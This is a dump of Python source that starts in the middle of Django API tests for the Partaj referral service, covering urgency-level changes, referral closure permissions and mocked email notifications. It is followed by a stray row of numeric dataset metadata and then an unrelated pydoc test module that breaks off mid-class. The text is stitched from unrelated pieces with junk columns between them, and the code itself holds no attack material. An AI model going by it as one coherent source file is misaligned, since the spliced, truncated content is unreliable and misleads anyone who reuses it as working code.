        f"/api/referrals/{referral.id}/change_urgencylevel/",
        {
            # Empty explanation: the request must be rejected.
            "urgencylevel_explanation": "",
            "urgencylevel": str(new_urgencylevel.id),
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 400)
    # Make sure the urgency level is unchanged
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.RECEIVED)
    self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
    # No notification should go out for a failed request.
    mock_mailer_send.assert_not_called()
def test_change_urgencylevel_from_processing_state(self, mock_mailer_send):
    """
    The urgency level can be changed on a referral in the PROCESSING state.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    new_urgencylevel = factories.ReferralUrgencyFactory()
    # Keep the old level around to verify the history record and the email payload.
    old_urgencylevel = referral.urgency_level
    self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
    response = self.client.post(
        f"/api/referrals/{referral.id}/change_urgencylevel/",
        {
            "urgencylevel_explanation": "La justification du changement.",
            "urgencylevel": str(new_urgencylevel.id),
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    # Make sure the urgency level is changed and an activity was logged.
    self.assertEqual(
        models.ReferralActivity.objects.filter(
            actor=user,
            verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
            referral=referral,
        ).count(),
        1,
    )
    referral.refresh_from_db()
    # The state itself is untouched by an urgency level change.
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
    self.assertEqual(mock_mailer_send.call_count, 1)
    # The requester is notified by email with both the old and new due dates.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "created_by": user.get_full_name(),
                        "link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
                        "message": "La justification du changement.",
                        "new_due_date": dateformat.format(
                            referral.get_due_date(), "j F Y"
                        ),
                        # The old due date is recomputed from the saved old level.
                        "old_due_date": dateformat.format(
                            referral.created_at + old_urgencylevel.duration, "j F Y"
                        ),
                        "topic": referral.topic.name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
    # Check the urgencylevel history instance that was created
    urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
        referral=referral, new_referral_urgency=new_urgencylevel
    )
    self.assertEqual(
        "La justification du changement.",
        urgencylevel_history.explanation,
    )
    self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
    self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_from_in_validation_state(self, mock_mailer_send):
    """
    The urgency level can be changed on a referral in the IN_VALIDATION state.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    new_urgencylevel = factories.ReferralUrgencyFactory()
    # Keep the old level around to verify the history record and the email payload.
    old_urgencylevel = referral.urgency_level
    self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
    response = self.client.post(
        f"/api/referrals/{referral.id}/change_urgencylevel/",
        {
            "urgencylevel_explanation": "La justification du changement.",
            "urgencylevel": str(new_urgencylevel.id),
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    # Make sure the urgency level is changed and an activity was logged.
    self.assertEqual(
        models.ReferralActivity.objects.filter(
            actor=user,
            verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
            referral=referral,
        ).count(),
        1,
    )
    referral.refresh_from_db()
    # The state itself is untouched by an urgency level change.
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
    self.assertEqual(mock_mailer_send.call_count, 1)
    # The requester is notified by email with both the old and new due dates.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "created_by": user.get_full_name(),
                        "link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
                        "message": "La justification du changement.",
                        "new_due_date": dateformat.format(
                            referral.get_due_date(), "j F Y"
                        ),
                        # The old due date is recomputed from the saved old level.
                        "old_due_date": dateformat.format(
                            referral.created_at + old_urgencylevel.duration, "j F Y"
                        ),
                        "topic": referral.topic.name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
    # Check the urgencylevel history instance that was created
    urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
        referral=referral, new_referral_urgency=new_urgencylevel
    )
    self.assertEqual(
        "La justification du changement.",
        urgencylevel_history.explanation,
    )
    self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
    self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_from_answered_state(self, mock_mailer_send):
    """
    The urgency level cannot be changed on a referral in the ANSWERED state.
    """
    # NOTE(review): the original docstring claimed the level "can be changed",
    # but the test asserts a 400 rejection — docstring corrected accordingly.
    referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    new_urgencylevel = factories.ReferralUrgencyFactory()
    old_urgencylevel = referral.urgency_level
    self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
    response = self.client.post(
        f"/api/referrals/{referral.id}/change_urgencylevel/",
        {
            "urgencylevel_explanation": "La justification du changement.",
            "urgencylevel": str(new_urgencylevel.id),
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {"errors": ["Cannot change urgency level from state answered."]},
    )
    # Make sure the urgency level is unchanged
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ANSWERED)
    self.assertEqual(referral.urgency_level.id, old_urgencylevel.id)
    mock_mailer_send.assert_not_called()
def test_change_urgencylevel_from_closed_state(self, mock_mailer_send):
    """
    The urgency level cannot be changed on a referral in the CLOSED state.
    """
    # NOTE(review): the original docstring claimed the level "can be changed",
    # but the test asserts a 400 rejection — docstring corrected accordingly.
    referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    new_urgencylevel = factories.ReferralUrgencyFactory()
    old_urgencylevel = referral.urgency_level
    self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
    response = self.client.post(
        f"/api/referrals/{referral.id}/change_urgencylevel/",
        {
            "urgencylevel_explanation": "La justification du changement.",
            "urgencylevel": str(new_urgencylevel.id),
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {"errors": ["Cannot change urgency level from state closed."]},
    )
    # Make sure the urgency level is unchanged
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.CLOSED)
    self.assertEqual(referral.urgency_level.id, old_urgencylevel.id)
    mock_mailer_send.assert_not_called()
# CLOSE REFERRAL TESTS
def test_close_by_anonymous_user(self, mock_mailer_send):
    """
    Anonymous users cannot close a referral.
    """
    # NOTE(review): the original docstring said "refuse" — this test exercises
    # the close_referral endpoint, so "close" is the accurate verb.
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    # No HTTP_AUTHORIZATION header: the request is anonymous.
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification du refus."},
    )
    self.assertEqual(response.status_code, 401)
    referral.refresh_from_db()
    self.assertEqual(
        referral.state,
        models.ReferralState.RECEIVED,
    )
    self.assertEqual(
        models.ReferralActivity.objects.count(),
        0,
    )
    mock_mailer_send.assert_not_called()
def test_close_by_random_logged_in_user(self, mock_mailer_send):
    """
    Random logged in users cannot close a referral.
    """
    # A user with no link to the referral or its unit.
    user = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification du refus."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # Authenticated but unauthorized: 403, and nothing changes.
    self.assertEqual(response.status_code, 403)
    referral.refresh_from_db()
    self.assertEqual(
        referral.state,
        models.ReferralState.RECEIVED,
    )
    self.assertEqual(
        models.ReferralActivity.objects.count(),
        0,
    )
    mock_mailer_send.assert_not_called()
def test_close_by_linked_user(self, mock_mailer_send):
    """
    A referral's linked user can close their own referrals.
    """
    user = factories.UserFactory()
    referral = factories.ReferralFactory(
        user=user, state=models.ReferralState.RECEIVED
    )
    # The unit owner is the recipient of the closure notification below.
    unit_owner = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    )
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    referral.refresh_from_db()
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    # The closure is recorded as an activity carrying the explanation.
    activity = models.ReferralActivity.objects.get(referral=referral)
    self.assertEqual(
        activity.message,
        "La justification de la cloture.",
    )
    self.assertEqual(activity.actor, user)
    self.assertEqual(mock_mailer_send.call_count, 1)
    # When the requester closes, the unit member is the one notified.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "closed_by": user.get_full_name(),
                        "link_to_referral": (
                            f"https://partaj/app/unit/{referral.units.get().id}"
                            f"/referrals-list/referral-detail/{referral.id}"
                        ),
                        "message": "La justification de la cloture.",
                        "referral_author": referral.user.get_full_name(),
                        "topic": referral.topic.name,
                        "units": referral.units.get().name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CLOSED_FOR_UNIT_MEMBER_TEMPLATE_ID"
                    ],
                    "to": [{"email": unit_owner.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
def test_close_by_unit_member(self, mock_mailer_send):
    """
    A regular unit member cannot close a referral.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    # MEMBER role: insufficient permissions, unlike ADMIN/OWNER.
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification du refus."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 403)
    referral.refresh_from_db()
    self.assertEqual(
        referral.state,
        models.ReferralState.RECEIVED,
    )
    self.assertEqual(
        models.ReferralActivity.objects.count(),
        0,
    )
    mock_mailer_send.assert_not_called()
def test_close_by_unit_admin(self, mock_mailer_send):
    """
    Unit admins can close referrals.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.ADMIN, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    referral.refresh_from_db()
    # The closure is recorded as an activity carrying the explanation.
    activity = models.ReferralActivity.objects.get(referral=referral)
    self.assertEqual(
        activity.message,
        "La justification de la cloture.",
    )
    self.assertEqual(activity.actor, user)
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    self.assertEqual(mock_mailer_send.call_count, 1)
    # When a unit admin closes, the requester is the one notified.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "closed_by": user.get_full_name(),
                        "link_to_referral": (
                            f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
                        ),
                        "message": "La justification de la cloture.",
                        "referral_author": referral.user.get_full_name(),
                        "topic": referral.topic.name,
                        "units": referral.units.get().name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
def test_close_by_unit_owner(self, mock_mailer_send):
    """
    Unit owners can close referrals.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    referral.refresh_from_db()
    # The closure is recorded as an activity carrying the explanation.
    activity = models.ReferralActivity.objects.get(referral=referral)
    self.assertEqual(
        activity.message,
        "La justification de la cloture.",
    )
    self.assertEqual(activity.actor, user)
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    self.assertEqual(mock_mailer_send.call_count, 1)
    # When a unit owner closes, the requester is the one notified.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "closed_by": user.get_full_name(),
                        "link_to_referral": (
                            f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
                        ),
                        "message": "La justification de la cloture.",
                        "referral_author": referral.user.get_full_name(),
                        "topic": referral.topic.name,
                        "units": referral.units.get().name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
def test_close_with_missing_explanation(self, mock_mailer_send):
    """
    Closure explanation is mandatory. Make sure the API returns an error when
    it is missing.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    # Even an otherwise-authorized unit admin cannot close without an explanation.
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.ADMIN, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": ""},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 400)
    referral.refresh_from_db()
    self.assertEqual(
        referral.state,
        models.ReferralState.RECEIVED,
    )
    self.assertEqual(
        models.ReferralActivity.objects.count(),
        0,
    )
    mock_mailer_send.assert_not_called()
def test_close_from_received_state(self, mock_mailer_send):
    """
    Referrals in the RECEIVED state can be closed.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    referral.refresh_from_db()
    # The closure is recorded as an activity carrying the explanation.
    activity = models.ReferralActivity.objects.get(referral=referral)
    self.assertEqual(
        activity.message,
        "La justification de la cloture.",
    )
    self.assertEqual(activity.actor, user)
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    self.assertEqual(mock_mailer_send.call_count, 1)
    # The requester is notified of the closure by email.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "closed_by": user.get_full_name(),
                        "link_to_referral": (
                            f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
                        ),
                        "message": "La justification de la cloture.",
                        "referral_author": referral.user.get_full_name(),
                        "topic": referral.topic.name,
                        "units": referral.units.get().name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
def test_close_from_processing_state(self, mock_mailer_send):
    """
    Referrals in the PROCESSING state can be closed.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    referral.refresh_from_db()
    # The closure is recorded as an activity carrying the explanation.
    activity = models.ReferralActivity.objects.get(referral=referral)
    self.assertEqual(
        activity.message,
        "La justification de la cloture.",
    )
    self.assertEqual(activity.actor, user)
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    self.assertEqual(mock_mailer_send.call_count, 1)
    # The requester is notified of the closure by email.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "closed_by": user.get_full_name(),
                        "link_to_referral": (
                            f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
                        ),
                        "message": "La justification de la cloture.",
                        "referral_author": referral.user.get_full_name(),
                        "topic": referral.topic.name,
                        "units": referral.units.get().name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
def test_close_from_in_validation_state(self, mock_mailer_send):
    """
    Referrals in the IN_VALIDATION state can be closed.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    self.assertEqual(response.status_code, 200)
    referral.refresh_from_db()
    # The closure is recorded as an activity carrying the explanation.
    activity = models.ReferralActivity.objects.get(referral=referral)
    self.assertEqual(
        activity.message,
        "La justification de la cloture.",
    )
    self.assertEqual(activity.actor, user)
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    self.assertEqual(mock_mailer_send.call_count, 1)
    # The requester is notified of the closure by email.
    self.assertEqual(
        tuple(mock_mailer_send.call_args_list[0]),
        (
            (  # args
                {
                    "params": {
                        "case_number": referral.id,
                        "closed_by": user.get_full_name(),
                        "link_to_referral": (
                            f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
                        ),
                        "message": "La justification de la cloture.",
                        "referral_author": referral.user.get_full_name(),
                        "topic": referral.topic.name,
                        "units": referral.units.get().name,
                    },
                    "replyTo": {
                        "email": "contact@partaj.beta.gouv.fr",
                        "name": "Partaj",
                    },
                    "templateId": settings.SENDINBLUE[
                        "REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
                    ],
                    "to": [{"email": referral.user.email}],
                },
            ),
            {},  # kwargs
        ),
    )
def test_close_from_answered_state(self, mock_mailer_send):
    """
    Referrals in the ANSWERED state cannot be closed.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # The state transition is invalid: 400 with an explicit error message.
    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(), {"errors": ["Cannot close referral from state answered."]}
    )
    referral.refresh_from_db()
    self.assertEqual(
        models.ReferralActivity.objects.count(),
        0,
    )
    self.assertEqual(
        referral.state,
        models.ReferralState.ANSWERED,
    )
    mock_mailer_send.assert_not_called()
def test_close_from_closed_state(self, mock_mailer_send):
    """
    Referrals in the CLOSED state cannot be closed (again).
    """
    referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
    ).user
    response = self.client.post(
        f"/api/referrals/{referral.id}/close_referral/",
        {"close_explanation": "La justification de la cloture."},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # The state transition is invalid: 400 with an explicit error message.
    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(), {"errors": ["Cannot close referral from state closed."]}
    )
    referral.refresh_from_db()
    self.assertEqual(
        models.ReferralActivity.objects.count(),
        0,
    )
    self.assertEqual(
        referral.state,
        models.ReferralState.CLOSED,
    )
    # Consistency fix: every sibling failure test asserts this via
    # assert_not_called() rather than comparing call_count to 0.
    mock_mailer_send.assert_not_called()
| 41.920875
| 115
| 0.604474
| 16,775
| 174,307
| 6.107422
| 0.023428
| 0.088724
| 0.052005
| 0.032269
| 0.955843
| 0.946824
| 0.937268
| 0.92904
| 0.91803
| 0.911158
| 0
| 0.006396
| 0.29144
| 174,307
| 4,157
| 116
| 41.93096
| 0.823127
| 0.061277
| 0
| 0.765212
| 0
| 0
| 0.142758
| 0.075548
| 0
| 0
| 0
| 0
| 0.202641
| 1
| 0.032721
| false
| 0
| 0.00287
| 0
| 0.035878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42a0c1a92a3134b8bb6cf3713e4e8d8702eeb816
| 6,693
|
py
|
Python
|
code/tmp_rtrip/test/pydocfodder.py
|
emilyemorehouse/ast-and-me
|
3f58117512e125e1ecbe3c72f2f0d26adb80b7b3
|
[
"MIT"
] | 24
|
2018-01-23T05:28:40.000Z
|
2021-04-13T20:52:59.000Z
|
code/tmp_rtrip/test/pydocfodder.py
|
emilyemorehouse/ast-and-me
|
3f58117512e125e1ecbe3c72f2f0d26adb80b7b3
|
[
"MIT"
] | 17
|
2017-12-21T18:32:31.000Z
|
2018-12-18T17:09:50.000Z
|
code/tmp_rtrip/test/pydocfodder.py
|
emilyemorehouse/ast-and-me
|
3f58117512e125e1ecbe3c72f2f0d26adb80b7b3
|
[
"MIT"
] | null | null | null |
"""Something just to look at via pydoc."""
import types
class A_classic:
    """A classic class."""

    # Method bodies are intentionally empty: only the names and docstrings
    # matter, since this module exists to exercise pydoc's rendering of
    # inherited and overridden methods.
    def A_method(self):
        """Method defined in A."""

    def AB_method(self):
        """Method defined in A and B."""

    def AC_method(self):
        """Method defined in A and C."""

    def AD_method(self):
        """Method defined in A and D."""

    def ABC_method(self):
        """Method defined in A, B and C."""

    def ABD_method(self):
        """Method defined in A, B and D."""

    def ACD_method(self):
        """Method defined in A, C and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""
class B_classic(A_classic):
    """A classic class, derived from A_classic."""

    # Overrides of methods shared with A, plus B's own methods.
    def AB_method(self):
        """Method defined in A and B."""

    def ABC_method(self):
        """Method defined in A, B and C."""

    def ABD_method(self):
        """Method defined in A, B and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def B_method(self):
        """Method defined in B."""

    def BC_method(self):
        """Method defined in B and C."""

    def BD_method(self):
        """Method defined in B and D."""

    def BCD_method(self):
        """Method defined in B, C and D."""
class C_classic(A_classic):
    """A classic class, derived from A_classic."""

    # Overrides of methods shared with A, plus C's own methods.
    def AC_method(self):
        """Method defined in A and C."""

    def ABC_method(self):
        """Method defined in A, B and C."""

    def ACD_method(self):
        """Method defined in A, C and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def BC_method(self):
        """Method defined in B and C."""

    def BCD_method(self):
        """Method defined in B, C and D."""

    def C_method(self):
        """Method defined in C."""

    def CD_method(self):
        """Method defined in C and D."""
class D_classic(B_classic, C_classic):
    """A classic class, derived from B_classic and C_classic."""

    # Diamond inheritance (A -> B/C -> D) exercises pydoc's MRO handling.
    def AD_method(self):
        """Method defined in A and D."""

    def ABD_method(self):
        """Method defined in A, B and D."""

    def ACD_method(self):
        """Method defined in A, C and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def BD_method(self):
        """Method defined in B and D."""

    def BCD_method(self):
        """Method defined in B, C and D."""

    def CD_method(self):
        """Method defined in C and D."""

    def D_method(self):
        """Method defined in D."""
class A_new(object):
    """A new-style class."""

    # Same method grid as A_classic, plus classmethod/staticmethod/property
    # descriptors so pydoc's rendering of every member kind gets exercised.
    def A_method(self):
        """Method defined in A."""

    def AB_method(self):
        """Method defined in A and B."""

    def AC_method(self):
        """Method defined in A and C."""

    def AD_method(self):
        """Method defined in A and D."""

    def ABC_method(self):
        """Method defined in A, B and C."""

    def ABD_method(self):
        """Method defined in A, B and D."""

    def ACD_method(self):
        """Method defined in A, C and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def A_classmethod(cls, x):
        """A class method defined in A."""
    # Old-style (pre-decorator) wrapping, preserved deliberately.
    A_classmethod = classmethod(A_classmethod)

    def A_staticmethod():
        """A static method defined in A."""
    A_staticmethod = staticmethod(A_staticmethod)

    def _getx(self):
        """A property getter function."""

    def _setx(self, value):
        """A property setter function."""

    def _delx(self):
        """A property deleter function."""
    A_property = property(fdel=_delx, fget=_getx, fset=_setx, doc=
        'A sample property defined in A.')
    # An alias to a builtin type, shown by pydoc as a class attribute.
    A_int_alias = int
class B_new(A_new):
    """A new-style class, derived from A_new."""

    # Overrides of methods shared with A, plus B's own methods.
    def AB_method(self):
        """Method defined in A and B."""

    def ABC_method(self):
        """Method defined in A, B and C."""

    def ABD_method(self):
        """Method defined in A, B and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def B_method(self):
        """Method defined in B."""

    def BC_method(self):
        """Method defined in B and C."""

    def BD_method(self):
        """Method defined in B and D."""

    def BCD_method(self):
        """Method defined in B, C and D."""
class C_new(A_new):
    """A new-style class, derived from A_new."""

    # Overrides of methods shared with A, plus C's own methods.
    def AC_method(self):
        """Method defined in A and C."""

    def ABC_method(self):
        """Method defined in A, B and C."""

    def ACD_method(self):
        """Method defined in A, C and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def BC_method(self):
        """Method defined in B and C."""

    def BCD_method(self):
        """Method defined in B, C and D."""

    def C_method(self):
        """Method defined in C."""

    def CD_method(self):
        """Method defined in C and D."""
class D_new(B_new, C_new):
    """A new-style class, derived from B_new and C_new.
    """

    # Diamond inheritance (A -> B/C -> D) exercises pydoc's MRO handling.
    def AD_method(self):
        """Method defined in A and D."""

    def ABD_method(self):
        """Method defined in A, B and D."""

    def ACD_method(self):
        """Method defined in A, C and D."""

    def ABCD_method(self):
        """Method defined in A, B, C and D."""

    def BD_method(self):
        """Method defined in B and D."""

    def BCD_method(self):
        """Method defined in B, C and D."""

    def CD_method(self):
        """Method defined in C and D."""

    def D_method(self):
        """Method defined in D."""
class FunkyProperties(object):
    """From SF bug 472347, by Roeland Rengelink.

    Property getters etc may not be vanilla functions or methods,
    and this used to make GUI pydoc blow up.
    """

    def __init__(self):
        # Backing store that the descriptor instances below read and write.
        self.desc = {'x': 0}

    # Each accessor is a callable *instance* (not a function), which is the
    # regression being tested: pydoc must handle non-function property parts.
    class get_desc:
        def __init__(self, attr):
            self.attr = attr
        def __call__(self, inst):
            print('Get called', self, inst)
